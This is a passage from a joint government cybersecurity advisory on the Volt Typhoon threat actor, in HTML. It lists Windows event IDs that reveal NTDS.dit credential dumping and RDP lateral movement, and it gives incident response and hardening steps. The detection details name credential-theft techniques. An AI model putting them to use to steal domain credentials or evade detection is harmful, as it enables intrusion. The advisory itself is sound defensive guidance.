3373. <td>325 (Windows ESENT Application Log)</td>
3374. <td>The database engine created a new database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit).</td>
3375. <td>Indicates creation of a new <code>NTDS.dit</code> file in a non-standard directory. Often a sign of data staging for exfiltration. Monitor for unusual database operations in temp directories.</td>
3376. </tr>
3377. <tr>
3378. <td>637 (Windows ESENT Application Log)</td>
3379. <td>C:\Windows\Temp\tmp\Active Directory\ntds.jfm-++- (0) New flush map file “C:\Windows\Temp\tmp\Active Directory\ntds.jfm” will be created to enable persisted lost flush detection.</td>
3380. <td>A new flush map file is being created for <code>NTDS.dit</code>. This may suggest ongoing operations related to NTDS credential dumping, potentially capturing uncommitted changes to the<code> NTDS.dit</code> file.</td>
3381. </tr>
3382. <tr>
3383. <td>326 (Windows ESENT Application Log)</td>
3384. <td>
3385. <p>NTDS-++-12460,D,100-++--++-1-++-</p>
3386. <p>C:\$SNAP_{redacted}_VOLUMEC$\Windows\NTDS\ntds.dit-++-0-++- [1] The database engine attached a database. Began mounting of C:\Windows\NTDS\ntds.dit file created from volume shadow copy process</p>
3387. </td>
3388. <td>Represents the mounting of an <code>NTDS.dit</code> file from a volume shadow copy. This is a critical step in NTDS credential dumping, indicating active manipulation of a domain controller’s data.</td>
3389. </tr>
3390. <tr>
3391. <td>327 (Windows ESENT Application Log)</td>
3392. <td>C:\Windows\Temp\tmp\Active Directory\ntds.dit-++-1-++- [1] The database engine detached a database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit). Completion of mounting of ntds.dit file to C:\Windows\Temp\tmp\Active Director</td>
3393. <td>The detachment of a database, particularly in a temp directory, could indicate the completion of a credential dumping process, potentially as part of exfiltration preparations.</td>
3394. </tr>
3395. <tr>
3396. <td>21 (Windows Terminal Services Local Session Manager Operational Log)</td>
3397. <td>Remote Desktop Services: Session logon succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}</td>
3398. <td>Successful authentication to a Remote Desktop Services session.</td>
3399. </tr>
3400. <tr>
3401. <td>22 (Windows Terminal Services Local Session Manager Operational Log)</td>
3402. <td>Remote Desktop Services: Shell start notification received: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}</td>
3403. <td>Successful start of a new Remote Desktop session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.</td>
3404. </tr>
3405. <tr>
3406. <td>23 (Windows Terminal Services Local Session Manager Operational Log)</td>
3407. <td>Remote Desktop Services: Session logoff succeeded: User: {redacted}\{redacted} Session ID: {redacted}</td>
3408. <td>Successful logoff of Remote Desktop session.</td>
3409. </tr>
3410. <tr>
3411. <td>24 (Windows Terminal Services Local Session Manager Operational Log)</td>
3412. <td>Remote Desktop Services: Session has been disconnected: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}</td>
3413. <td>Remote Desktop session disconnected by user or due to network connectivity issues.</td>
3414. </tr>
3415. <tr>
3416. <td>25 (Windows  Terminal Services Local Session Manager Operational Log)</td>
3417. <td>Remote Desktop Services: Session reconnection succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}</td>
3418. <td>Successful reconnection to a Remote Desktop Services session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.</td>
3419. </tr>
3420. <tr>
3421. <td>1017 (Windows System Log)</td>
3422. <td>
3423. <p>Handle scavenged.</p>
3424. <p>Share Name: C$</p>
3425. <p>File Name:</p>
3426. <p>users\{redacted}\downloads\History.zip Durable: 1 Resilient or Persistent: 0 Guidance: The server closed a handle that was previously reserved for a client after 60 seconds.</p>
3427. </td>
3428. <td>Indicates the server closed a handle for a client. While common in network operations, unusual patterns or locations (like <code>History.zip</code> in a user’s downloads) may suggest data collection from a local system.</td>
3429. </tr>
3430. <tr>
3431. <td>1102 (Windows Security Log)</td>
3432. <td>All</td>
3433. <td>All Event ID <code>1102</code> entries should be investigated as logs are generally not cleared and this is a known Volt Typhoon tactic to cover their tracks.</td>
3434. </tr>
3435. </tbody>
3436. </table>
3437. <h4><strong>Monitor and Review OT System Logs</strong></h4>
3438. <ul>
3439. <li>Review access logs for communication paths between IT and OT networks, looking for anomalous accesses or protocols.</li>
3440. <li>Measure the baseline of normal operations and network traffic for the industrial control system (ICS) and assess traffic anomalies for malicious activity.</li>
3441. <li>Configure intrusion detection systems (IDS) to create alarms for any ICS network traffic outside normal operations.</li>
3442. <li>Track and monitor audit trails on critical areas of ICS.</li>
3443. <li>Set up security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.</li>
3444. </ul>
3445. <p>Review CISA’s <a href="https://www.cisa.gov/sites/default/files/publications/Cybersecurity_Best_Practices_for_Industrial_Control_Systems.pdf" title="Recommended Cybersecurity Practices for Industrial Control Systems">Recommended Cybersecurity Practices for Industrial Control Systems</a> and the joint advisory, <a href="https://media.defense.gov/2020/Jul/23/2002462846/-1/-1/0/OT_ADVISORY-DUAL-OFFICIAL-20200722.PDF" title="NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems">NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems</a>, for further OT system detection and mitigation guidance.</p>
3446. <h4><strong>Use gait to Detect Possible Network Proxy Activities</strong></h4>
3447. <p><strong>Use gait[</strong><a href="https://github.com/sandialabs/gait" title="sandialabs / gait"><strong>4</strong></a><strong>] to detect network proxy activities</strong>. Developed by Sandia National Labs, gait is a publicly available Zeek[<a href="https://zeek.org/" title="Open Source Network Security Monitoring Tool">5</a>] extension. The <a href="https://github.com/sandialabs/gait" title="sandialabs / gait">gait </a>extension can help enrich Zeek’s network connection monitoring and SSL logs by including additional metadata in the logs. Specifically, gait captures unique TCP options and timing data such as a TCP, transport layer security (TLS), and Secure Shell (SSH) layer inferred round trip times (RTT), aiding in the identification of the software used by both endpoints and intermediaries.</p>
3448. <p>While the gait extension for Zeek is an effective tool for enriching network monitoring logs with detailed metadata, it is not specifically designed to detect Volt Typhoon actor activities. The extension’s capabilities extend to general anomaly detection in network traffic, including—but not limited to—proxying activities. Therefore, while gait can be helpful in identifying tactics similar to those used by Volt Typhoon, such as proxy networks and FRP clients for C2 communication, not all proxying activities detected by using this additional metadata are necessarily indicative of Volt Typhoon presence. It serves as a valuable augmentation to current security stacks for a broader spectrum of threat detection.</p>
3449. <p>For more information, see Sandia National Lab’s gait GitHub page <a href="https://github.com/sandialabs/gait" title="sandialabs / gait">sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies</a>.</p>
3450. <h4><strong>Review Logins for Impossible Travel</strong></h4>
3451. <p><strong>Examine VPN or other account logon times, frequency, duration, and locations.</strong> Logons from two geographically distant locations within a short timeframe from a single user may indicate an account is being used maliciously. Logons of unusual frequency or duration may indicate a threat actor attempting to access a system repeatedly or maintain prolonged sessions for the purpose of data extraction.</p>
3452. <h4><strong>Review Standard Directories for Unusual Files</strong></h4>
3453. <p><strong>Review directories, such as </strong><code><strong>C:\windows\temp\</strong></code><strong> and</strong> <code><strong>C:\users\public\</strong></code><strong>, for unexpected or unusual files</strong>. Monitor these temporary file storage directories for files typically located in standard system paths, such as the <code>System32</code> directory. For example, Volt Typhoon has been observed downloading <code>comsvcs.dll</code> to a non-standard folder (this file is normally found in the <code>System32</code> folder).</p>
3454. <h3><strong>INCIDENT RESPONSE</strong></h3>
3455. <p>If compromise, or potential compromise, is detected, <strong>organizations should assume full domain compromise</strong> because of Volt Typhoon’s known behavioral pattern of extracting the <code>NTDS.dit</code> from the DCs. Organizations should immediately implement the following immediate, defensive countermeasures:</p>
3456. <ol>
3457. <li><strong>Sever the enterprise network from the internet. Note:</strong> this step requires the agency to understand its internal and external connections. When making the decision to sever internet access, knowledge of connections must be combined with care to avoid disrupting critical functions.
3458. <ul>
3459. <li>If you cannot sever from the internet,<strong> shutdown all non-essential traffic between the affected enterprise network and the internet</strong>.</li>
3460. </ul>
3461. </li>
3462. <li><strong>Reset credentials of privileged and non-privileged accounts within the trust boundary of each compromised account</strong>.
3463. <ul>
3464. <li>Reset passwords for all domain users and all local accounts, such as <code>Guest</code>, <code>HelpAssistant</code>, <code>DefaultAccount</code>, <code>System</code>, <code>Administrator</code>, and <code>krbtgt</code>. The <code>krbtgt</code> account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The <code>krbtgt</code> account should be reset twice because the account has a two-password history. The first account reset for the <code>krbtgt</code> needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s <a href="https://www.cisa.gov/news-events/analysis-reports/ar21-134a" title="Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise">Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise</a> for more information. Although tailored to FCEB agencies compromised in the <a href="https://www.cisa.gov/news-events/alerts/2021/01/07/supply-chain-compromise" title="Supply Chain Compromise">2020 SolarWinds Orion supply chain compromise</a>, the steps are applicable to organizations with Windows AD compromise.
3465. <ul>
3466. <li>Review access policies to temporarily revoke privileges/access for affected accounts/devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them.</li>
3467. </ul>
3468. </li>
3469. <li>Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions.
3470. <ul>
3471. <li>Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access.</li>
3472. </ul>
3473. </li>
3474. </ul>
3475. </li>
3476. <li><strong>Audit all network appliance and edge device configurations with indicators of malicious activity for signs of unauthorized or malicious configuration changes</strong>. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time. If configuration changes are identified:
3477. <ul>
3478. <li>Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.).</li>
3479. <li>Update all firmware and software to the latest version.</li>
3480. </ul>
3481. </li>
3482. <li><strong>Report the compromise to an authoring agency </strong>(see the Contact Information section).</li>
3483. <li>For organizations with cloud or hybrid environments, <strong>apply best practices for identity and credential access management. </strong>
3484. <ul>
3485. <li>Verify that all accounts with privileged role assignments are cloud native, not synced from Active Directory.</li>
3486. <li>Audit conditional access policies to ensure Global Administrators and other highly privileged service principals and accounts are not exempted.</li>
3487. <li>Audit privileged role assignments to ensure adherence to the principle of least privilege when assigning privileged roles.</li>
3488. <li>Leverage just-in-time and just-enough access mechanisms when administrators need to elevate to a privileged role.</li>
3489. <li>In hybrid environments, ensure federated systems (such as AD FS) are configured and monitored properly.</li>
3490. <li>Audit Enterprise Applications for recently added applications and examine the API permissions assigned to each.</li>
3491. </ul>
3492. </li>
3493. <li><strong>Reconnect to the internet.</strong> <strong>Note:</strong> The decision to reconnect to the internet depends on senior leadership’s confidence in the actions taken. It is possible—depending on the environment—that new information discovered during pre-eviction and eviction steps could add additional eviction tasks.</li>
3494. <li><strong>Minimize and control use of remote access tools and protocols</strong> by applying best practices from joint <a href="https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a> and joint Cybersecurity Information Sheet: <a href="https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF" title="Keeping PowerShell: Security Measures to Use and Embrace">Keeping PowerShell: Security Measures to Use and Embrace</a>.</li>
3495. <li><strong>Consider sharing technical information with an authoring agency and/or a sector-specific information sharing and analysis center.</strong></li>
3496. </ol>
3497. <p>For more information on incident response and remediation, see:</p>
3498. <ul>
3499. <li>Joint advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-245a" title="Technical Approaches to Uncovering and Remediating Malicious Activity">Technical Approaches to Uncovering and Remediating Malicious Activity</a><u>.</u> This advisory provides incident response best practices.</li>
3500. <li>CISA’s <a href="https://www.cisa.gov/resources-tools/resources/federal-government-cybersecurity-incident-and-vulnerability-response-playbooks" title="Federal Government Cybersecurity Incident and Vulnerability Response Playbooks">Federal Government Cybersecurity Incident and Vulnerability Response Playbooks</a>. Although tailored to U.S. Federal Civilian Executive Branch (FCEB) agencies, the playbooks are applicable to all organizations. The incident response playbook provides procedures to identify, coordinate, remediate, recover, and track successful mitigations from incidents.</li>
3501. <li>Joint <a href="https://www.cisa.gov/resources-tools/resources/water-and-wastewater-sector-incident-response-guide-0" title="Water and Wastewater Sector - Incident Response Guide">Water and Wastewater Sector - Incident Response Guide</a>. This joint guide provides incident response best practices and information on federal resources for Water and Wastewater Systems Sector organizations.</li>
3502. </ul>
3503. <h3><strong>MITIGATIONS</strong></h3>
3504. <p>These mitigations<strong> </strong>are intended for IT administrators in critical infrastructure organizations. The authoring agencies recommend that software manufactures incorporate secure by design and default principles and tactics into their software development practices to strengthen the security posture for their customers.</p>
3505. <p>For information on secure by design practices that may protect customers against common Volt Typhoon techniques, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living off the Land Techniques</a> and joint Secure by Design Alert <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-security-design-improvements-soho-device-manufacturers" title="Secure by Design Alert: Security Design Improvements for SOHO Device Manufacturers">Security Design Improvements for SOHO Device Manufacturers</a>.</p>
3506. <p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">joint guide</a>.</p>
3507. <p>The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of Volt Typhoon activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
3508. <h4><strong>IT Network Administrators and Defenders</strong></h4>
3509. <h5><em><strong>Harden the Attack Surface</strong></em></h5>
3510. <ul>
3511. <li><strong>Apply patches for internet-facing systems within a risk-informed span of time </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="Cybersecurity Performance Goals (CPGs)">CPG 1E</a>]. Prioritize patching critical assets, <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a>, and vulnerabilities in appliances known to be frequently exploited by Volt Typhoon (e.g., Fortinet, Ivanti, NETGEAR, Citrix, and Cisco devices).</li>
3512. <li><strong>Apply vendor-provided or industry standard hardening guidance</strong> to strengthen software and system configurations. <strong>Note:</strong> As part of CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design campaign</a>, CISA urges software manufacturers to prioritize secure by default configurations to eliminate the need for customer implementation of hardening guidelines.</li>
3513. <li><strong>Maintain and regularly update an inventory of all organizational IT assets</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#AssetInventory1A" title="Cybersecurity Performance Goals (CPGs)">CPG 1A</a>].</li>
3514. <li><strong>Use third party assessments to validate current system and network security compliance</strong> via security architecture reviews, penetration tests, bug bounties, attack surface management services, incident simulations, or table-top exercises (both announced and unannounced) [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ThirdPartyValidationofCybersecurityControlEffectiveness1F" title="Cybersecurity Performance Goals (CPGs)">CPG 1F</a>].</li>
3515. <li><strong>Limit internet exposure of systems when not necessary</strong>. An organization’s primary attack surface is the combination of the exposure of all its internet-facing systems. Decrease the attack surface by not exposing systems or management interfaces to the internet when not necessary.</li>
3516. <li><strong>Plan “end of life” for technology beyond manufacturer supported lifecycle</strong>. Inventories of organizational assets should be leveraged in patch and configuration management as noted above. Inventories will also enable identification of technology beyond the manufacturer’s supported lifecycle. Where technology is beyond “end of life” or “end of support,” additional cybersecurity vigilance is necessary, and may warrant one or more of the following:
3517. <ul>
3518. <li>Supplemental support agreements;</li>
3519. <li>Additional scanning and testing;</li>
3520. <li>Configuration changes;</li>
3521. <li>Isolation;</li>
3522. <li>Segmentation; and</li>
3523. <li>Development of forward-looking plans to facilitate replacement.</li>
3524. </ul>
3525. </li>
3526. </ul>
3527. <h5><em><strong>Secure Credentials</strong></em></h5>
3528. <ul>
3529. <li><strong>Do not store credentials on edge appliances/devices. </strong>Ensure edge devices do not contain accounts that could provide domain admin access.</li>
3530. <li><strong>Do not store plaintext credentials on any system</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Cybersecurity Performance Goals (CPGs)">CPG 2L</a>]. Credentials should be stored securely—such as with a credential/password manager or vault, or other privileged account management solutions—so they can only be accessed by authenticated and authorized users.</li>
3531. <li><strong>Change default passwords </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ChangingDefaultPasswords2A" title="Cybersecurity Performance Goals (CPGs)">CPG 2A</a>] and ensure they meet the policy requirements for complexity.</li>
3532. <li>Implement and enforce an organizational system-enforced policy that:
3533. <ul>
3534. <li><strong>Requires passwords for all IT password-protected assets to be at least 15 characters;</strong></li>
3535. <li><strong>Does not allow users to reuse passwords for accounts, applications, services</strong>, etc., [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#UniqueCredentials2C" title="Cybersecurity Performance Goals (CPGs)">CPG 2C</a>]; and</li>
3536. <li><strong>Does not allow service accounts/machine accounts to reuse passwords</strong> from member user accounts.</li>
3537. </ul>
3538. </li>
3539. <li><strong>Configure Group Policy settings to prevent web browsers from saving passwords</strong> and disable autofill functions.</li>
3540. <li><strong>Disable the storage of clear text passwords in LSASS memory</strong>.</li>
3541. </ul>
3542. <h5><em><strong>Secure Accounts</strong></em></h5>
3543. <ul>
3544. <li><strong>Implement </strong><a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA"><strong>phishing-resistant MFA</strong></a> for access to assets [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Cybersecurity Performance Goals (CPGs)">CPG 2H</a>].</li>
3545. <li><strong>Separate user and privileged accounts</strong>.
3546. <ul>
3547. <li>User accounts should never have administrator or super-user privileges [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Cybersecurity Performance Goals (CPGs)">CPG 2E</a>].</li>
3548. <li>Administrators should never use administrator accounts for actions and activities not associated with the administrator role (e.g., checking email, web browsing).</li>
3549. </ul>
3550. </li>
3551. <li><strong>Enforce the principle of least privilege</strong>.
3552. <ul>
3553. <li><strong>Ensure administrator accounts only have the minimum permissions</strong> necessary to complete their tasks.</li>
3554. <li><strong>Review account permissions for default/accounts for edge appliances/devices and remove domain administrator privileges,</strong> if identified.</li>
3555. <li><strong>Significantly limit the number of users with elevated privileges</strong>. Implement continuous monitoring for changes in group membership, especially in privileged groups, to detect and respond to unauthorized modifications.</li>
3556. <li><strong>Remove accounts from high-privilege groups like Enterprise Admins and Schema Admins</strong>. Temporarily reinstate these privileges only when necessary and under strict auditing to reduce the risk of privilege abuse.</li>
3557. <li><strong>Transition to Group Managed Service Accounts (gMSAs) </strong>where suitable for enhanced management and security of service account credentials. gMSAs provide automated password management and simplified Service Principal Name (SPN) management, enhancing security over traditional service accounts. See Microsoft’s <a href="https://learn.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview" title="Group Managed Service Accounts Overview">Group Managed Service Accounts Overview</a><u>.</u></li>
3558. </ul>
3559. </li>
3560. <li><strong>Enforce strict policies via Group Policy and User Rights Assignments</strong> to limit high-privilege service accounts.</li>
3561. <li><strong>Consider using a privileged access management (PAM) solution</strong> to manage access to privileged accounts and resources [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Cybersecurity Performance Goals (CPGs)">CPG 2L</a>]. PAM solutions can also log and alert usage to detect any unusual activity.</li>
3562. <li><strong>Complement the PAM solution with role-based access control (RBAC)</strong> for tailored access based on job requirements. This ensures that elevated access is granted only when required and for a limited duration, minimizing the window of opportunity for abuse or exploitation of privileged credentials.</li>
3563. <li><strong>Implement an Active Directory tiering model to segregate administrative accounts</strong> based on their access level and associated risk. This approach reduces the potential impact of a compromised account. See Microsoft’s <a href="https://learn.microsoft.com/en-us/microsoft-identity-manager/pam/tier-model-for-partitioning-administrative-privileges" title="Tier model for partitioning administrative privileges">PAM environment tier model</a>.</li>
3564. <li><strong>Harden administrative workstations</strong> to only permit administrative activities from workstations appropriately hardened based on the administrative tier. See Microsoft’s <a href="https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-devices" title="Securing devices as part of the privileged access story">Why are privileged access devices important - Privileged access</a>.</li>
3565. <li><strong>Disable all user accounts and access to organizational resources of employees on the day of their departure</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#RevokingCredentialsforDepartingEmployees2D" title="Cybersecurity Performance Goals (CPGs)">CPG 2G</a>]</li>
3566. <li><strong>Regularly audit all user, admin, and service accounts </strong>and remove or disable unused or unneeded accounts as applicable.</li>
3567. <li><strong>Regularly roll NTLM hashes of accounts that support token-based authentication.</strong></li>
3568. <li>Improve management of hybrid (cloud and on-premises) identity federation by:
3569. <ul>
3570. <li><strong>Using cloud only administrators that are asynchronous with on-premises environments</strong> and ensuring on-premises administrators are asynchronous to the cloud.</li>
3571. <li><strong>Using CISA’s </strong><a href="https://github.com/cisagov/ScubaGear" title="cisagov / ScubaGear"><strong>SCuBAGear tool</strong></a><strong> to discover cloud misconfigurations in Microsoft cloud tenants</strong>. SCuBA gear is automation script for comparing Federal Civilian Executive Branch (FCEB) agency tenant configurations against CISA M365 baseline recommendations. SCuBAGear is part of CISA’s Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies, securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. For more information on SCuBAGear see CISA’s <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project" title="Secure Cloud Business Applications (SCuBA) Project">Secure Cloud Business Applications (SCuBA) Project</a>.</li>
3572. <li><strong>Using endpoint detection and response capabilities to actively </strong>defend on-premises federation servers.</li>
3573. </ul>
3574. </li>
3575. </ul>
3576. <h5><em><strong>Secure Remote Access Services</strong></em></h5>
3577. <ul>
3578. <li><strong>Limit the use of RDP and other remote desktop services</strong>. If RDP is necessary, apply best practices, including auditing the network for systems using RDP, closing unused RDP ports, and logging RDP login attempts.</li>
3579. <li><strong>Disable Server Message Block (SMB) protocol version 1 and upgrade to version 3 (SMBv3) </strong>after mitigating existing dependencies (on existing systems or applications), as they may break when disabled.</li>
3580. <li><strong>Harden SMBv3</strong> by implementing guidance included in joint <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a> (see page 8 of the guide).</li>
3581. <li><strong>Apply mitigations from the joint </strong><a href="https://www.cisa.gov/sites/default/files/2023-06/Guide%20to%20Securing%20Remote%20Access%20Software_clean%20Final_508c.pdf" title="Guide to Securing Remote Access Software"><strong>Guide to Securing Remote Access Software</strong></a>.</li>
3582. </ul>
3583. <h5><em><strong>Secure Sensitive Data</strong></em></h5>
3584. <ul>
3585. <li><strong>Securely store sensitive data</strong> (including operational technology documentation, network diagrams, etc.), ensuring that only authenticated and authorized users can access the data.</li>
3586. </ul>
3587. <h5><em><strong>Implement Network Segmentation</strong></em></h5>
3588. <ul>
3589. <li><strong>Ensure that sensitive accounts use their administrator credentials only on hardened, secure computers</strong>. This practice can reduce lateral movement exposure within networks.</li>
3590. <li><strong>Conduct comprehensive trust assessments to identify business-critical trusts and apply necessary controls</strong> to prevent unauthorized cross-forest/domain traversal.</li>
3591. <li><strong>Harden federated authentication by enabling Secure Identifier (SID) Filtering and Selective Authentication on AD trust relationships</strong> to further restrict unauthorized access across domain boundaries.</li>
3592. <li><strong>Implement network segmentation to isolate federation servers</strong> from other systems and limit allowed traffic to systems and protocols that require access in accordance with Zero Trust principles.</li>
3593. </ul>
3594. <h5><em><strong>Secure Cloud Assets</strong></em></h5>
3595. <ul>
3596. <li><strong>Harden cloud assets</strong> in accordance with vendor-provided or industry standard hardening guidance.
3597. <ul>
3598. <li>Organizations with Microsoft cloud infrastructure, see CISA’s <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project#:~:text=Microsoft%20365%20%26%20Google%20Workspace%20Baselines" title="Microsoft 365 & Google Workspace Secure Configuration Baselines">Microsoft 365 Security Configuration Baseline Guides</a>, which provide minimum viable secure configuration baselines for Microsoft Defender for Office 365, Azure Active Directory (now known as Microsoft Entra ID), Exchange Online, OneDrive for Business, Power BI, Power Platform, SharePoint Online, and Teams. For additional guidance, see the Australian Signals Directorate’s <a href="https://blueprint.asd.gov.au/" title="ASD's Blueprint for Secure Cloud">Blueprint for Secure Cloud</a>.</li>
3599. <li>Organizations with Google cloud infrastructure, see CISA’s <a href="https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project#:~:text=Microsoft%20365%20%26%20Google%20Workspace%20Baselines" title="Microsoft 365 & Google Workspace Secure Configuration Baselines">Google Workspace Security Configuration Baseline Guides</a>, which provide minimum viable secure configuration baselines for Groups for Business, GMAIL, Google Calendar, Google Chat, Google Common Controls, Google Classroom, Google Drive and Docs, Google Meet, and Google Sites.</li>
3600. </ul>
3601. </li>
3602. <li><strong>Revoke unnecessary public access to cloud environment.</strong> This involves reviewing and restricting public endpoints and ensuring that services like storage accounts, databases, and virtual machines are not publicly accessible unless absolutely necessary. Disable legacy authentication protocols across all cloud services and platforms. Legacy protocols frequently lack support for advanced security mechanisms such as multifactor authentication, rendering them susceptible to compromises. Instead, enforce the use of modern authentication protocols that support stronger security features like MFA, token-based authentication, and adaptive authentication measures.
3603. <ul>
3604. <li><strong>Enforce this practice through the use of Conditional Access Policies</strong>. These policies can initially be run in report-only mode to identify potential impacts and plan mitigations before fully enforcing them. This approach allows organizations to systematically control access to their cloud resources, significantly reducing the risk of unauthorized access and potential compromise.</li>
3605. </ul>
3606. </li>
3607. <li><strong>Regularly monitor and audit privileged cloud-based accounts</strong>, including service accounts, which are frequently abused to enable broad cloud resource access and persistence.</li>
3608. </ul>
3609. <h5><em><strong>Be Prepared</strong></em></h5>
3610. <ul>
3611. <li><strong>Ensure logging is turned on for application, access, and security logs </strong>(e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and VPNs) [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#LogCollection2T" title="Cybersecurity Performance Goals (CPGs)">CPG 2T</a>]. Given Volt Typhoon’s use of LOTL techniques and their significant dwell time, application event logs may be a valuable resource to hunt for Volt Typhoon activity because these logs typically remain on endpoints for relatively long periods of time.
3612. <ul>
3613. <li>For OT assets where logs are non-standard or not available, <strong>collect network traffic and communications between those assets and other assets</strong>.</li>
3614. <li>Implement file integrity monitoring (FIM) tools to detect unauthorized changes.</li>
3615. </ul>
3616. </li>
3617. <li><strong>Store logs in a central system</strong>, such as a security information and event management (SIEM) tool or central database.
3618. <ul>
3619. <li><strong>Ensure the logs can only be accessed or modified by authorized and authenticated users </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureLogStorage2U" title="Cybersecurity Performance Goals (CPGs)">CPG 2U</a>].</li>
3620. <li><strong>Store logs for a period informed by risk or pertinent regulatory guidelines</strong>.</li>
3621. <li><strong>Tune log alerting to reduce noise while ensuring there are alerts for high-risk activities</strong>. (For information on alert tuning, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a>.)</li>
3622. </ul>
3623. </li>
3624. <li><strong>Establish and continuously maintain a baseline of installed tools and software, account behavior, and network traffic</strong>. This way, network defenders can identify potential outliers, which may indicate malicious activity. <strong>Note:</strong> For information on establishing a baseline, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living off the Land Techniques</a>.</li>
3625. <li><strong>Document a list of threats and cyber actor TTPs relevant to your organization</strong> (e.g., based on industry or sectors), and maintain the ability (such as via rules, alerting, or commercial prevention and detection systems) to detect instances of those key threats [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectingRelevantThreatsandTTPs3A" title="Cybersecurity Performance Goals (CPGs)">CPG 3A</a>].</li>
3626. <li><strong>Implement periodic training for all employees and contractors that covers basic security concepts</strong> (such as phishing, business email compromise, basic operational security, password security, etc.), as well as fostering an internal culture of security and cyber awareness [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#BasicCybersecurityTraining2I" title="Cybersecurity Performance Goals (CPGs)">CPG 2I</a>].
3627. <ul>
